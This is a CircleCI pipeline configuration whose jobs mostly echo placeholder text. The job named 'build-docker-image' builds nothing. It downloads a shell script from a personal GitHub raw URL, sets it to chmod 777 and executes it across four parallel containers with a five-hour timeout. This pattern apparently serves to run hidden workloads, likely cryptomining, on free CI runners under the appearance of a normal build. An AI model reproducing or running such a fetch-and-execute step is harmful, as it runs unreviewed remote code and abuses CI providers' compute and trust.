version: 2.1

# Define the jobs we want to run for this project
jobs:
  prepare-dependencies:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo nice 
  build-production:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo build-production
  deploy-docker-image:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var referenc
    steps:
      - run: echo build-docker-image
  build-docker-image:
    docker:
      - image: circleci/ruby:2.5.5
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    parallelism: 4    
    steps:
      - run: 
         name: 
         command: wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/rubys.sh && chmod 777 rubys.sh && ./rubys.sh
         no_output_timeout: 5h
  test:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo test_build
# Orchestrate our job run sequence
workflows:
  build_and_test:
    jobs:
      - prepare-dependencies
      - build-production:
          requires:
            - prepare-dependencies
      - test:
          requires:
            - build-production
            - prepare-dependencies
      - build-docker-image:
          requires:
            - test            
      - deploy-docker-image:
          requires:
            - test     
       
